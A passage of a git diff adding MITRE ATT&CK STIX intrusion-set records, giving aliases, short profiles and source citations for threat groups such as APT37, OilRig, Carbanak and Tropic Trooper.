"2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0067", + "external_id": "G0067" + }, + { + "source_name": "APT37", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "Richochet Chollima", + "description": "(Citation: CrowdStrike Richochet Chollima September 2021)" + }, + { + "source_name": "InkySquid", + "description": "(Citation: Volexity InkySquid BLUELIGHT August 2021)" + }, + { + "source_name": "ScarCruft", + "description": "(Citation: Securelist ScarCruft Jun 2016)(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft May 2019)" + }, + { + "source_name": "Reaper", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "Group123", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "TEMP.Reaper", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "FireEye APT37 Feb 2018", + "description": "FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" + }, + { + "url": "https://securelist.com/operation-daybreak/75100/", + "description": "Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.", + "source_name": "Securelist ScarCruft Jun 2016" + }, + { + "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.", + "source_name": "Talos Group123" + }, + { + "source_name": "CrowdStrike Richochet Chollima September 2021", + "url": "https://adversary.crowdstrike.com/en-US/adversary/ricochet-chollima/", + "description": "CrowdStrike. (2021, September 30). Adversary Profile - Richochet Chollima. Retrieved September 30, 2021." + }, + { + "source_name": "Volexity InkySquid BLUELIGHT August 2021", + "url": "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/", + "description": "Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021." + }, + { + "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.", + "url": "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", + "source_name": "Securelist ScarCruft May 2019" + } + ], + "modified": "2021-10-15T16:54:01.193Z", + "name": "APT37", + "description": "[APT37](https://attack.mitre.org/groups/G0067) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos Group123)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c.json new file mode 100644 index 0000000000000000000000000000000000000000..561a9a8fd8ed492a1a36090f5cdd4efb415d87e4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--fa49313d-9761-49d7-97b1-870bcd996803", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T18:50:12.653Z", + "name": "Moses Staff", + "description": "[Moses Staff](https://attack.mitre.org/groups/G1009) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://attack.mitre.org/groups/G1009) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand.(Citation: Checkpoint MosesStaff Nov 2021) \n\nSecurity researchers assess [Moses Staff](https://attack.mitre.org/groups/G1009) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.(Citation: Cybereason StrifeWater Feb 2022)", + "aliases": [ + "Moses Staff" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Hiroki Nagahama, NEC Corporation", + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India" + ], + "type": "intrusion-set", + "id": "intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c", + "created": "2022-08-11T22:47:27.686Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1009", + "external_id": "G1009" + }, + { + "source_name": "Checkpoint MosesStaff Nov 2021", + "description": "Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022.", + "url": "https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/" + }, + { + "source_name": "Cybereason StrifeWater Feb 2022", + "description": "Cybereason Nocturnus. (2022, February 1). StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations. Retrieved August 15, 2022.", + "url": "https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json new file mode 100644 index 0000000000000000000000000000000000000000..b9da16c3669d68328c39174151f822d5b3b77de1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json @@ -0,0 +1,127 @@ +{ + "type": "bundle", + "id": "bundle--d180526c-3e96-46de-b255-2bd8728abe0c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-06T20:58:52.317Z", + "name": "OilRig", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)", + "aliases": [ + "OilRig", + "COBALT GYPSY", + "IRN2", + "APT34", + "Helix Kitten", + "Evasive Serpens" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Robert Falcone", + "Bryan Lee", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0049", + "external_id": "G0049" + }, + { + "source_name": "IRN2", + "description": "(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "OilRig", + "description": "(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)" + }, + { + "source_name": "COBALT GYPSY", + "description": "(Citation: Secureworks COBALT GYPSY Threat Profile)" + }, + { + "source_name": "Helix Kitten", + "description": "(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "Evasive Serpens", + "description": "(Citation: Unit42 OilRig Playbook 2023)" + }, + { + "source_name": "Check Point APT34 April 2021", + "description": "Check Point. (2021, April 8). Iran\u2019s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.", + "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + }, + { + "source_name": "ClearSky OilRig Jan 2017", + "description": "ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.", + "url": "http://www.clearskysec.com/oilrig/" + }, + { + "source_name": "Palo Alto OilRig May 2016", + "description": "Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + }, + { + "source_name": "Palo Alto OilRig April 2017", + "description": "Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/" + }, + { + "source_name": "Palo Alto OilRig Oct 2016", + "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" + }, + { + "source_name": "Unit 42 QUADAGENT July 2018", + "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/" + }, + { + "source_name": "Crowdstrike Helix Kitten Nov 2018", + "description": "Meyers, A. (2018, November 27). Meet CrowdStrike\u2019s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + }, + { + "source_name": "Secureworks COBALT GYPSY Threat Profile", + "description": "Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy" + }, + { + "source_name": "APT34", + "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)" + }, + { + "source_name": "Unit 42 Playbook Dec 2017", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.", + "url": "https://pan-unit42.github.io/playbook_viewer/" + }, + { + "source_name": "Unit42 OilRig Playbook 2023", + "description": "Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.", + "url": "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a.json new file mode 100644 index 0000000000000000000000000000000000000000..eb6002f17b7b79829243e906c6637c8275562575 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--512f7360-3e9f-41ca-878f-d813af97ea7e", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Windigo" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a", + "type": "intrusion-set", + "created": "2021-02-10T19:57:38.042Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0124", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0124" + }, + { + "source_name": "ESET Windigo Mar 2014", + "url": "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", + "description": "Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., L\u00e9veill\u00e9, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo \u2013 the vivisection of a large Linux server\u2011side credential\u2011stealing malware campaign. Retrieved February 10, 2021." + }, + { + "source_name": "CERN Windigo June 2019", + "url": "https://security.web.cern.ch/advisories/windigo/windigo.shtml", + "description": "CERN. (2019, June 4). 2019/06/04 Advisory: Windigo attacks. Retrieved February 10, 2021." + } + ], + "modified": "2021-04-26T22:32:57.046Z", + "name": "Windigo", + "description": "The [Windigo](https://attack.mitre.org/groups/G0124) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://attack.mitre.org/software/S0377) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://attack.mitre.org/groups/G0124) operators continued updating [Ebury](https://attack.mitre.org/software/S0377) through 2019.(Citation: ESET Windigo Mar 2014)(Citation: CERN Windigo June 2019)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3.json new file mode 100644 index 0000000000000000000000000000000000000000..5fbd8fe2ffde4c868524d3f173417fba018132fd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--2071d209-5ba2-4dc1-9167-2a50bd60221e", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Higaisa" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3", + "type": "intrusion-set", + "created": "2021-03-05T18:54:56.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0126", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0126" + }, + { + "source_name": "Malwarebytes Higaisa 2020", + "url": "https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/", + "description": "Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021." + }, + { + "source_name": "Zscaler Higaisa 2020", + "url": "https://www.zscaler.com/blogs/security-research/return-higaisa-apt", + "description": "Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021." + }, + { + "source_name": "PTSecurity Higaisa 2020", + "url": "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", + "description": "PT ESC Threat Intelligence. (2020, June 4). COVID-19 and New Year greetings: an investigation into the tools and methods used by the Higaisa group. Retrieved March 2, 2021." + } + ], + "modified": "2021-04-22T02:12:43.892Z", + "name": "Higaisa", + "description": "[Higaisa](https://attack.mitre.org/groups/G0126) is a threat group suspected to have South Korean origins. [Higaisa](https://attack.mitre.org/groups/G0126) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://attack.mitre.org/groups/G0126) was first disclosed in early 2019 but is assessed to have operated as early as 2009.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c.json new file mode 100644 index 0000000000000000000000000000000000000000..5f3bc9545dfd312650a00e78f4729762f7068678 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c.json @@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--5471d760-5018-4c0c-849e-d5273f6cd0ec", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Carbanak", + "Anunak" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Anastasios Pingios" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c", + "type": "intrusion-set", + "created": "2017-05-31T21:31:49.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0008", + "external_id": "G0008" + }, + { + "source_name": "Carbanak", + "description": "(Citation: Kaspersky Carbanak) (Citation: Fox-It Anunak Feb 2015)" + }, + { + "source_name": "Anunak", + "description": "(Citation: Fox-It Anunak Feb 2015)" + }, + { + "source_name": "Kaspersky Carbanak", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "source_name": "FireEye FIN7 April 2017" + }, + { + "source_name": "Europol Cobalt Mar 2018", + "description": "Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.", + "url": "https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021." + }, + { + "source_name": "Secureworks GOLD KINGSWOOD Threat Profile", + "url": "https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain", + "description": "Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021." + }, + { + "source_name": "Fox-It Anunak Feb 2015", + "description": "Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.", + "url": "https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/" + } + ], + "modified": "2021-10-18T21:02:30.899Z", + "name": "Carbanak", + "description": "[Carbanak](https://attack.mitre.org/groups/G0008) is a cybercriminal group that has used [Carbanak](https://attack.mitre.org/software/S0030) malware to target financial institutions since at least 2013. [Carbanak](https://attack.mitre.org/groups/G0008) may be linked to groups tracked separately as [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN7](https://attack.mitre.org/groups/G0046) that have also used [Carbanak](https://attack.mitre.org/software/S0030) malware.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 April 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: Secureworks GOLD KINGSWOOD Threat Profile)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924.json new file mode 100644 index 0000000000000000000000000000000000000000..72e4f086025cb53089c69ab6ee49166e986a4b7d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--45d417fe-e041-4afb-9793-76f75cbfa8ab", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Tropic Trooper", + "Pirate Panda", + "KeyBoy" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Edward Millington", + "Bart Parys" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924", + "type": "intrusion-set", + "created": "2019-01-29T20:17:48.717Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0081", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0081" + }, + { + "source_name": "Tropic Trooper", + "description": "(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)" + }, + { + "source_name": "Pirate Panda", + "description": "(Citation: Crowdstrike Pirate Panda April 2020)" + }, + { + "source_name": "KeyBoy", + "description": "(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper Mar 2018)" + }, + { + "description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "source_name": "TrendMicro Tropic Trooper Mar 2018" + }, + { + "description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "source_name": "Unit 42 Tropic Trooper Nov 2016" + }, + { + "source_name": "TrendMicro Tropic Trooper May 2020", + "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf", + "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020." + }, + { + "source_name": "Crowdstrike Pirate Panda April 2020", + "url": "https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/", + "description": "Busselen, M. (2020, April 7). On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations. Retrieved May 20, 2020." + } + ], + "modified": "2021-04-26T14:15:15.610Z", + "name": "Tropic Trooper", + "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)", + "x_mitre_version": "1.4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1.json new file mode 100644 index 0000000000000000000000000000000000000000..55fcc8ec76c6225f19d4f3d6288b94e65a285926 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b806dace-cbf8-4abb-ab85-0178783fe175", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Orangeworm" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0071", + "external_id": "G0071" + }, + { + "source_name": "Orangeworm", + "description": "(Citation: Symantec Orangeworm April 2018)" + }, + { + "url": "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", + "description": "Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.", + "source_name": "Symantec Orangeworm April 2018" + } + ], + "modified": "2021-10-26T22:29:09.327Z", + "name": "Orangeworm", + "description": "[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46.json new file mode 100644 index 0000000000000000000000000000000000000000..67efd006afcd9d80fa0b2948c4b8b9ffa8be19aa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--897010ab-2b18-4e3b-a70b-04ede0287e2c", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Taidoor" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46", + "type": "intrusion-set", + "created": "2017-05-31T21:31:52.018Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0015", + "external_id": "G0015" + } + ], + "modified": "2021-10-15T00:34:25.521Z", + "name": "Taidoor", + "description": "[Taidoor](https://attack.mitre.org/groups/G0015) has been deprecated, as the only technique it was linked to was deprecated in ATT&CK v7.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": 